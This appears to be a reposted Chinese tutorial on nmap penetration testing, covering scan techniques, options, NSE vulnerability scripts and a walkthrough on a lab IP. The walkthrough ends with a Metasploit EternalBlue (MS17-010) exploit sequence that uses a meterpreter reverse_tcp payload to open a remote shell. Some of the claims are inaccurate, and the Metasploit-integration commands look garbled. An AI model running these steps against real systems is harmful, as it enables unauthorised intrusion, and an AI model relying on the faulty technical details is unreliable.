nmap渗透测试实战

这篇具有很好参考价值的文章主要介绍了nmap渗透测试实战。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

预计更新
第一章 nmap漏洞扫描
nmap漏洞扫描的基本原理和技术
nmap漏洞扫描的常用选项和参数
nmap漏洞扫描的实战案例

第二章 nmap网络探测和映射
nmap网络探测和映射的基本原理和技术
nmap网络探测和映射的常用选项和参数
nmap网络探测和映射的实战案例

第三章 nmap安全审计
nmap安全审计的基本原理和技术
nmap安全审计的常用选项和参数
nmap安全审计的实战案例

第四章 nmap远程管理和监控
nmap远程管理和监控的基本原理和技术
nmap远程管理和监控的常用选项和参数
nmap远程管理和监控的实战案例

第五章 nmap数据分析和可视化
nmap数据分析和可视化的基本原理和技术
nmap数据分析和可视化的常用选项和参数
nmap数据分析和可视化的实战案例

第六章 nmap脚本编写和使用
nmap脚本编写和使用的基本原理和技术
nmap脚本编写和使用的常用选项和参数
nmap脚本编写和使用的实战案例

第七章 nmap渗透测试实战
nmap渗透测试的基本原理和技术
nmap渗透测试的常用选项和参数
nmap渗透测试的实战案例

第八章 nmap与其他工具结合使用
nmap与Metasploit、Nessus等工具的结合使用
nmap与其他工具的结合使用的常用选项和参数
nmap与其他工具结合使用的实战案例

第九章 nmap在云安全中的应用
nmap在云安全中的基本原理和技术
nmap在云安全中的常用选项和参数
nmap在云安全中的实战案例

第十章 nmap在移动设备安全中的应用
nmap在移动设备安全中的基本原理和技术
nmap在移动设备安全中的常用选项和参数
nmap在移动设备安全中的实战案例

第十一章 nmap在网络安全监控中的应用
nmap在网络安全监控中的基本原理和技术
nmap在网络安全监控中的常用选项和参数
nmap在网络安全监控中的实战案例

第十二章 nmap在物联网安全中的应用
nmap在物联网安全中的基本原理和技术
nmap在物联网安全中的常用选项和参数
nmap在物联网安全中的实战案例

第十三章 nmap的其他实战应用
nmap在Web应用安全中的实战案例
nmap在无线网络安全中的实战案例

第七章 nmap渗透测试实战
nmap渗透测试的基本原理和技术
nmap渗透测试的常用选项和参数
nmap渗透测试的实战案例

nmap渗透测试的基本原理和技术
Nmap是一种常用的渗透测试工具,可以扫描网络主机以及端口开放情况,并提供有关主机的详细信息,如操作系统类型、服务版本等。本文将介绍Nmap的基本原理和技术,包括Nmap的工作原理、扫描技术、扫描选项和用例等。

一、Nmap的工作原理

Nmap是一款基于网络的扫描器,工作原理是向目标主机发送网络数据包并分析响应。具体来说,Nmap通过发送各种类型的TCP和UDP数据包来扫描目标主机上的端口和服务,以确定主机的开放端口和运行的服务。Nmap还使用操作系统指纹识别技术来确定目标主机的操作系统类型和版本。

Nmap的工作流程如下:

  1. 端口扫描

Nmap通过向目标主机发送TCP和UDP数据包来扫描开放的端口。传统的端口扫描技术包括TCP全连接扫描、TCP SYN扫描、TCP ACK扫描、UDP扫描等。

  • TCP全连接扫描:Nmap向目标主机发送一个完整的TCP连接请求,并等待主机返回一个完整的TCP连接响应。如果主机响应,则端口被视为开放;如果主机未响应,则端口被视为关闭。

  • TCP SYN扫描:Nmap向目标主机发送一个TCP SYN包,并等待主机返回一个TCP SYN/ACK包。如果主机响应,则端口被视为开放;如果主机返回TCP RST包,则端口被视为关闭。

  • TCP ACK扫描:Nmap向目标主机发送一个TCP ACK包,并等待主机返回TCP RST包。如果主机返回TCP RST包,则端口被视为关闭;如果主机未响应,则该端口可能被过滤。

  • UDP扫描:Nmap向目标主机发送UDP数据包,并等待主机返回ICMP端口不可达消息。如果主机返回ICMP消息,则端口被视为关闭;如果主机未响应,则端口可能被开放或过滤。

  1. 操作系统指纹识别

Nmap通过分析目标主机的TCP/IP栈的响应,来确定目标主机的操作系统类型和版本。操作系统指纹识别技术是通过分析响应的TCP/IP栈的行为,来确定目标主机的操作系统类型和版本。Nmap使用TCP/IP栈中的特定行为来确定操作系统类型和版本。

二、Nmap的扫描技术

Nmap支持多种扫描技术,包括基于TCP和UDP的扫描技术,以及基于ICMP和ARP的发现技术。

  1. TCP扫描技术
  • 全连接扫描:Nmap发送完整的TCP连接请求,并等待主机返回完整的TCP连接响应。该技术可以确定端口是否开放,但可能被目标主机的防火墙检测到。

  • SYN扫描:Nmap发送一个TCP SYN包,并等待主机返回TCP SYN/ACK包。该技术可以确定端口是否开放,同时不会在目标主机的防火墙中被检测到。

  • ACK扫描:Nmap发送一个TCP ACK包,并等待主机返回TCP RST包。该技术可以确定端口是否被过滤,但无法确定端口是否开放。

  • FIN扫描:Nmap发送一个TCP FIN包,并等待主机返回TCP RST包。该技术可以确定端口是否被过滤,但无法确定端口是否开放。

  • XMAS扫描:Nmap发送一个TCP URG、PSH和FIN标志位都为1的数据包,并等待主机返回TCP RST包。该技术可以确定端口是否被过滤,但无法确定端口是否开放。

  1. UDP扫描技术
  • UDP扫描:Nmap发送UDP数据包,并等待主机返回ICMP端口不可达消息。该技术可以确定端口是否开放,但由于UDP协议的无连接性,可能会导致误报。
  1. 发现技术
  • ICMP发现:Nmap使用ICMP数据包来发现主机是否在线和其IP地址。该技术可以发现网络中的主机,但可能会被防火墙和IDS/IPS检测到。

  • ARP发现:Nmap使用ARP协议来发现局域网中的主机。该技术可以发现局域网中的主机,但可能会受到防火墙和IDS/IPS的干扰。

三、Nmap的扫描选项

Nmap提供多种扫描选项,以满足不同的渗透测试需求。

  1. 基本扫描选项
  • -sS:使用TCP SYN扫描技术进行扫描。

  • -sT:使用TCP全连接扫描技术进行扫描。

  • -sU:使用UDP扫描技术进行扫描。

  1. 高级扫描选项
  • -O:使用操作系统指纹识别技术来确定目标主机的操作系统类型和版本。

  • -sV:使用服务指纹识别技术来确定目标主机上运行的服务及其版本。

  • -A:综合使用操作系统指纹识别和服务指纹识别技术来确定目标主机的操作系统类型和版本以及运行的服务及其版本。

  1. 输出选项
  • -oN:将扫描结果保存为文本文件。

  • -oX:将扫描结果保存为XML文件。

  • -oG:将扫描结果保存为可读性较好的文本文件。

四、Nmap的用例

Nmap是一款功能强大的渗透测试工具,可以用于多种用例,包括:

  1. 网络发现:使用Nmap进行网络发现,可以发现局域网中的主机以及其开放的端口和运行的服务。

  2. 端口扫描:使用Nmap进行端口扫描,可以确定目标主机上开放的端口和运行的服务,以及目标主机的操作系统类型和版本。

  3. 漏洞扫描:使用Nmap结合漏洞库进行漏洞扫描,可以发现目标主机上存在的漏洞,以便进行修复和防范。

  4. 安全审计:使用Nmap进行安全审计,可以检查网络中的主机的安全性,以及发现存在的安全漏洞和风险。

  5. 渗透测试:使用Nmap进行渗透测试,可以模拟黑客攻击,发现网络中存在的安全漏洞和弱点,以便进行修复和防范。

总结

Nmap是一款功能强大的渗透测试工具,可以用于网络发现、端口扫描、漏洞扫描、安全审计和渗透测试等多种用例。Nmap的工作原理是向目标主机发送网络数据包,并根据目标主机的响应来确定目标主机的开放端口和运行服务。Nmap提供多种扫描技术和选项,以满足不同的渗透测试需求。使用Nmap进行渗透测试应该遵循法律和道德规范,以保护自己和他人的安全和隐私。
nmap渗透测试的常用选项和参数
Nmap是一款功能强大的渗透测试工具,可以用于多种用例,包括网络发现、端口扫描、漏洞扫描、安全审计和渗透测试等。Nmap提供了多种选项和参数,以满足不同的渗透测试需求。本文将介绍Nmap渗透测试的常用选项和参数,详细具体,涵盖以下内容:

  1. 基本扫描选项

  2. 高级扫描选项

  3. 输出选项

  4. 脚本选项

  5. Nmap NSE脚本

  6. Nmap脚本引擎

  7. Nmap脚本分类

  8. Nmap脚本示例

  9. Nmap的GUI界面

  10. 基本扫描选项

Nmap提供了多种基本扫描选项,用于进行基本的端口扫描。

1.1 -sS选项

-sS选项用于进行TCP SYN扫描。TCP SYN扫描是最常用的扫描技术之一,也是最常见的扫描技术之一。它利用TCP协议的三次握手机制来确定端口是否开放。它发送一个TCP SYN数据包到目标端口,如果目标端口处于打开状态,则目标主机将返回一个TCP SYN/ACK数据包,表明端口处于打开状态。如果目标端口处于关闭状态,则目标主机将返回一个TCP RST数据包,表明端口处于关闭状态。如果目标主机没有响应,则该端口可能被过滤。

-sS选项的参数和用法:

-sS [扫描目标]

例如:

nmap -sS 192.168.1.1

此命令将对192.168.1.1进行TCP SYN扫描。

1.2 -sT选项

-sT选项用于进行TCP全连接扫描。TCP全连接扫描是一种比TCP SYN扫描更可靠的扫描技术。它利用TCP协议的三次握手机制来确定端口是否开放。它发送一个完整的TCP连接请求到目标端口,如果目标端口处于打开状态,则目标主机将返回一个TCP连接确认数据包,表明端口处于打开状态。如果目标端口处于关闭状态,则目标主机将返回一个TCP RST数据包,表明端口处于关闭状态。如果目标主机没有响应,则该端口可能被过滤。

-sT选项的参数和用法:

-sT [扫描目标]

例如:

nmap -sT 192.168.1.1

此命令将对192.168.1.1进行TCP全连接扫描。

1.3 -sU选项

-sU选项用于进行UDP扫描。UDP扫描是一种基于UDP协议的扫描技术。UDP协议是无连接的,因此UDP扫描可能会出现误报。UDP扫描发送UDP数据包到目标端口,如果目标端口处于打开状态,则目标主机将返回一个UDP数据包,表明端口处于打开状态。如果目标端口处于关闭状态,则目标主机将返回一个ICMP端口不可达消息,表明端口处于关闭状态。如果目标主机没有响应,则该端口可能被过滤。

-sU选项的参数和用法:

-sU [扫描目标]

例如:

nmap -sU 192.168.1.1

此命令将对192.168.1.1进行UDP扫描。

1.4 -sP选项

-sP选项用于进行主机发现。它不会对目标主机进行端口扫描,而是仅仅确认目标主机是否处于在线状态。它发送一个ICMP Echo请求到目标主机,如果目标主机响应了ICMP Echo回应,则表示目标主机在线。如果目标主机没有响应,则表示目标主机可能离线或被过滤。

-sP选项的参数和用法:

-sP [扫描目标]

例如:

nmap -sP 192.168.1.0/24

此命令将对192.168.1.0/24子网中的所有主机进行主机发现。

  1. 高级扫描选项

Nmap还提供了多种高级扫描选项,用于进行更加复杂的渗透测试。

2.1 -sV选项

-sV选项用于进行服务版本检测。它可以识别目标主机上运行的服务及其版本信息。它利用多种技术进行服务版本检测,包括发送特定的协议请求、解析服务响应、识别服务指纹等。服务版本信息可以帮助渗透测试人员了解目标主机上运行的服务及其漏洞信息。

-sV选项的参数和用法:

-sV [扫描目标]

例如:

nmap -sV 192.168.1.1

此命令将对192.168.1.1进行服务版本检测。

2.2 -sA选项

-sA选项用于进行TCP ACK扫描。TCP ACK扫描是一种被动扫描技术,它利用TCP协议的ACK标志位来探测目标主机上的防火墙和其他网络设备。它发送一个TCP ACK数据包到目标端口,如果目标主机返回了TCP RST数据包,则表明目标主机上没有防火墙或其他网络设备。如果目标主机没有响应,则表明目标主机上可能存在防火墙或其他网络设备。

-sA选项的参数和用法:

-sA [扫描目标]

例如:

nmap -sA 192.168.1.1

此命令将对192.168.1.1进行TCP ACK扫描。

2.3 -sN和-sF选项

-sN和-sF选项用于进行TCP NULL和TCP FIN扫描。TCP NULL扫描和TCP FIN扫描都是被动扫描技术,它们利用TCP协议的一些特殊标志位来探测目标主机上的防火墙和其他网络设备。它们发送一个TCP NULL或TCP FIN数据包到目标端口,如果目标主机返回了TCP RST数据包,则表明目标主机上没有防火墙或其他网络设备。如果目标主机没有响应,则表明目标主机上可能存在防火墙或其他网络设备。

-sN和-sF选项的参数和用法:

-sN [扫描目标] (TCP NULL扫描)
-sF [扫描目标] (TCP FIN扫描)

例如:

nmap -sN 192.168.1.1

此命令将对192.168.1.1进行TCP NULL扫描。

2.4 -sX选项

-sX选项用于进行TCP Xmas扫描。TCP Xmas扫描是一种被动扫描技术,它利用TCP协议的一些特殊标志位来探测目标主机上的防火墙和其他网络设备。它发送一个TCP Xmas数据包到目标端口,如果目标主机返回了TCP RST数据包,则表明目标主机上没有防火墙或其他网络设备。如果目标主机没有响应,则表明目标主机上可能存在防火墙或其他网络设备。

-sX选项的参数和用法:

-sX [扫描目标]

例如:

nmap -sX 192.168.1.1

此命令将对192.168.1.1进行TCP Xmas扫描。

2.5 -sS选项

-sS选项用于进行TCP SYN扫描,也称为半开放扫描。TCP SYN扫描是一种主动扫描技术,它利用TCP协议的三次握手过程来探测目标主机上的开放端口。它发送一个TCP SYN数据包到目标端口,如果目标主机返回了TCP SYN/ACK数据包,则表明目标端口是开放的。如果目标主机返回了TCP RST数据包,则表明目标端口是关闭的。如果目标主机没有响应,则表明目标端口可能被过滤。

-sS选项的参数和用法:

-sS [扫描目标]

例如:

nmap -sS 192.168.1.1

此命令将对192.168.1.1进行TCP SYN扫描。

  1. 高级输出选项

Nmap还提供了多种高级输出选项,用于对扫描结果进行过滤和处理。

3.1 -oA选项

-oA选项用于将扫描结果输出到多个文件中,包括Nmap格式、XML格式和grepable格式。Nmap格式和XML格式可以用于后续的分析和处理,grepable格式可以用于快速搜索和过滤。

-oA选项的参数和用法:

-oA [输出文件名] [扫描目标]

例如:

nmap -sS -oA scan 192.168.1.1

此命令将对192.168.1.1进行TCP SYN扫描,并将扫描结果输出到scan.nmap、scan.xml和scan.gnmap三个文件中。

3.2 -oG选项

-oG选项用于将扫描结果输出到grepable格式的文件中。grepable格式可以用于快速搜索和过滤。

-oG选项的参数和用法:

-oG [输出文件名] [扫描目标]

例如:

nmap -sS -oG scan.gnmap 192.168.1.1

此命令将对192.168.1.1进行TCP SYN扫描,并将扫描结果输出到scan.gnmap文件中。

3.3 -oX选项

-oX选项用于将扫描结果输出到XML格式的文件中。XML格式可以用于后续的分析和处理。

-oX选项的参数和用法:

-oX [输出文件名] [扫描目标]

例如:

nmap -sS -oX scan.xml 192.168.1.1

此命令将对192.168.1.1进行TCP SYN扫描,并将扫描结果输出到scan.xml文件中。

以上是Nmap的一些常用选项和用法,Nmap还提供了更多高级选项和功能,如OS检测、端口扫描技术、脚本扫描等。渗透测试人员可以根据具体的需求和情况选择合适的选项和功能进行使用。

  1. NSE脚本扫描

Nmap还提供了一种强大的扫描技术——NSE脚本扫描。NSE脚本是一种使用Lua编写的脚本,可以用于自动化扫描和漏洞检测。NSE脚本可以对目标主机进行各种类型的扫描和探测,例如端口扫描、服务版本检测、漏洞检测、操作系统检测等。NSE脚本可以扩展Nmap的功能,使其更加适用于渗透测试和安全审计。

NSE脚本扫描的使用方法:

使用-n参数指定扫描目标,并使用–script参数指定要使用的脚本。可以使用脚本名或路径来指定脚本。也可以使用通配符来指定多个脚本。

例如,使用http-title.nse脚本来获取目标主机上HTTP服务的标题信息:

nmap -n -sV --script=http-title.nse 192.168.1.1

使用-v参数可以增加输出详细程度。

  1. Metasploit集成

Metasploit是一种流行的渗透测试工具,它可以用于漏洞扫描、漏洞利用和后渗透测试等场景。Nmap可以与Metasploit集成,将扫描结果直接传递给Metasploit进行后续操作。

集成步骤:

首先,需要在Metasploit中启动RPC服务。在Metasploit的控制台中输入:

msfconsole -r /opt/metasploit-framework/config/database.yml -q

然后,在Nmap中使用–script参数指定msf、msf-auth和msf-rpc脚本,并使用–script-args参数指定Metasploit的RPC地址和端口。

例如:

nmap -n -sV --script=msf,msf-auth,msf-rpc --script-args=msf-rpc.server-host=192.168.1.1,msf-rpc.server-port=55552 192.168.1.1

此命令将对192.168.1.1进行端口扫描,并将扫描结果传递给Metasploit进行后续操作。

以上是Nmap的一些高级用法和扩展功能,可以帮助渗透测试人员更加高效地进行扫描和漏洞检测。需要注意的是,在进行渗透测试时,应该遵守有关法律和道德规范,不得进行未授权的攻击和侵入行为。

nmap渗透测试的实战案例
本文将结合实际案例,介绍如何利用Nmap进行渗透测试,涵盖基本的端口扫描、服务版本探测、漏洞扫描、脚本扫描以及与Metasploit的集成等方面。

  1. 基本端口扫描

首先,我们将对一个IP地址进行基本的端口扫描,以确定目标主机开放了哪些端口,以及运行哪些服务。我们使用命令:

nmap -p- 192.168.1.1

该命令将扫描目标主机的所有端口。结果显示目标主机开放了80、443、3389、445、139等端口。

  1. 服务版本探测

接下来,我们将使用Nmap的服务版本探测功能,确定目标主机上运行的服务版本。我们使用命令:

nmap -sV 192.168.1.1

该命令将对目标主机进行服务版本探测。结果显示目标主机上运行的服务版本,包括HTTP、SMB、RDP等。

我们发现目标主机上运行了一个HTTP服务,我们可以进一步探测该服务的详细信息。我们使用命令:

nmap -sV --script=http-enum 192.168.1.1

该命令将使用Nmap的http-enum脚本,对HTTP服务进行详细探测。结果显示目标主机上运行的HTTP服务是Microsoft IIS 7.5,可以获取IIS的版本号、安装路径等信息。

  1. 漏洞扫描

接下来,我们将使用Nmap的漏洞扫描功能,探测目标主机上是否存在已知的漏洞。我们使用命令:

nmap -sV --script=vuln 192.168.1.1

该命令将使用Nmap的vuln脚本,对目标主机上的服务进行漏洞扫描。结果显示目标主机上存在若干漏洞,包括SMB远程执行漏洞、MS17-010漏洞等。

我们可以进一步利用Nmap的NSE脚本扫描功能,对漏洞进行深入的检测。例如,我们可以使用命令:

nmap -sV --script=smb-vuln-ms17-010 192.168.1.1

该命令将使用Nmap的smb-vuln-ms17-010脚本,对目标主机上的SMB服务进行MS17-010漏洞扫描。结果显示目标主机上存在MS17-010漏洞,可以远程执行代码。

  1. NSE脚本扫描

接下来,我们将使用Nmap的NSE脚本扫描功能,进一步探测目标主机。我们使用命令:

nmap -sV --script=http-vuln-cve2017-5638 192.168.1.1

该命令将使用Nmap的http-vuln-cve2017-5638脚本,对目标主机上的HTTP服务进行漏洞扫描。结果显示目标主机上存在CVE-2017-5638漏洞,可以远程执行命令。

我们还可以使用Nmap的NSE脚本扫描功能,对目标主机进行操作系统探测。例如,我们可以使用命令:

nmap -O 192.168.1.1

该命令将对目标主机进行操作系统探测。结果显示目标主机是Windows 7或Windows Server 2008 R2。

  1. Metasploit集成

最后,我们将使用Nmap与Metasploit进行集成,利用已知的漏洞进行攻击。我们首先需要在Metasploit中启动RPC服务:

msfconsole -r /opt/metasploit-framework/config/database.yml -q然后,在Nmap中使用–script参数指定msf、msf-auth和msf-rpc脚本,并使用–script-args参数指定Metasploit的RPC地址和端口。

nmap -n -sV --script=msf,msf-auth,msf-rpc --script-args=msf-rpc.server-host=192.168.1.1,msf-rpc.server-port=55552 192.168.1.1

该命令将扫描目标主机,并将扫描结果传递给Metasploit进行后续操作。在Metasploit中,我们可以利用漏洞进行攻击,例如使用MS17-010漏洞攻击目标主机:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
run

该命令将使用Metasploit的MS17-010漏洞利用模块,对目标主机进行攻击。如果攻击成功,我们可以获得对目标主机的远程访问权限。

总结

综上所述,Nmap是一款功能强大的渗透测试工具,可以用于端口扫描、服务版本探测、漏洞扫描、脚本扫描等方面。同时,Nmap还可以与Metasploit进行集成,实现自动化攻击。在使用Nmap进行渗透测试时,需要遵守相关法律和道德规范,不得进行未授权的攻击和侵入行为。文章来源地址https://www.toymoban.com/news/detail-540388.html

到了这里,关于nmap渗透测试实战的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • linux高级篇基础理论五(用户安全,口令设置,JR暴力破解用户密码,NMAP端口扫描)

    ♥️ 作者:小刘在C站 ♥️ 个人主页:  小刘主页  ♥️ 不能因为人生的道路坎坷,就使自己的身躯变得弯曲;不能因为生活的历程漫长,就使求索的 脚步迟缓。 ♥️ 学习两年总结出的运维经验,以及思科模拟器全套网络实验教程。专栏: 云计算技术 ♥️ 感谢CSDN让你我相遇

    2024年02月05日
    浏览(51)
  • [渗透教程]-004-嗅探工具-Nmap

    nmap是一个网络扫描和主机检测工具,它可以帮助用户识别网络上的设备和服务。获取主机正在运行哪些服务,nmap支持多种扫描,UDP,TCP connect(),TCP SYN(半开扫描) ftp代理,反向标志,ICMP,FIN,ACK扫描,ftp代理,反向标志,ICMP. 可以用于检测网络上活的主机; 检测主机上开放的端口; 检测操作

    2023年04月09日
    浏览(32)
  • 【web安全】渗透测试实战思路

    1. 不建议太小的公司(可能都是请别人来开发的,用现成成熟的框架) 2. 不建议一线大厂:腾讯,字节,阿里等,你懂的 3. 不建议政府部门,安全设备多,每年有护网,报警你就死 建议:找上市公司与子公司,有开发人员,就有漏洞 重点:先在天眼查那些找域名 所有上市

    2024年02月19日
    浏览(56)
  • Nmap详细介绍高级应用

    nmap的定义 nmap的定义: nmap是一款开源的网络探测和安全审核工具,可以用来扫描网络主机,确定哪些主机在运行、运行哪些服务以及运行哪个操作系统等信息。它可以通过各种方式对目标主机进行探测,如TCP SYN扫描、UDP扫描、TCP connect() 扫描、FTP bounce攻击扫描等。同时,

    2023年04月10日
    浏览(35)
  • Nmap入门到高级【第六章】

    Nmap基础知识 1.1 Nmap简介和历史 1.2 Nmap安装和使用方法 1.3 Nmap扫描技术和扫描选项 Nmap扫描技术 2.1 端口扫描技术 2.2 操作系统检测技术 2.3 服务和应用程序检测技术 2.4 漏洞检测技术 Nmap扫描选项 3.1 扫描类型选项 3.2 过滤器选项 3.3 探测选项 3.4 输出选项 Nmap脚本引擎 4.1 Nmap脚本

    2023年04月23日
    浏览(45)
  • BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)

    渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。 Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况

    2024年02月13日
    浏览(46)
  • Kali--Nmap实战

    首先在Kali里面察看自己的IP地址,以便后续操作 可以使用 nmap -sn IP扫描同网段存活的主机    根据扫描结果,可以确定同网段所有存活的主机,包括自己的靶机 常见的操作系统类型是Windows和Linux系统,我们可以使用nmap命令对靶机{(10.225.91.17),你们可以根据自己的靶机进行

    2024年02月16日
    浏览(24)
  • Nmap漏洞检测实战

    1、PC终端一个(博主是Win11电脑,读者要注意) 1、nmap安装包(7.9.2版本)下载地址 提取码:hqlk 2、VM虚拟机(一台为 Kali Linux,一台为Windows XP SP2) 如何实现只在一个PC上,搭建同一个网段的Win11(IP:155.148)、Kali Linux(IP:155.152)、Windows xp(IP:155.150)三套系统,且能互相Pin

    2024年02月09日
    浏览(30)
  • nmap安全审计

    预计更新 第一章 nmap漏洞扫描 nmap漏洞扫描的基本原理和技术 nmap漏洞扫描的常用选项和参数 nmap漏洞扫描的实战案例 第二章 nmap网络探测和映射 nmap网络探测和映射的基本原理和技术 nmap网络探测和映射的常用选项和参数 nmap网络探测和映射的实战案例 第三章 nmap安全审计 nm

    2024年02月12日
    浏览(43)
  • 网络安全-再谈nmap

    之前我学习nmap的时候,对很多命令一知半解。为了加深印象,再写一次。 -sV,使用SYN扫描,模拟的是TCP握手的端口扫描技术,因为UDP是无连接的,所以对UDP协议是无效的。SYN可以显示出端口是否开放,但是无法探测端口的应用程序的版本,比如是SMB的什么版本。 -sU,和名字

    2024年02月21日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包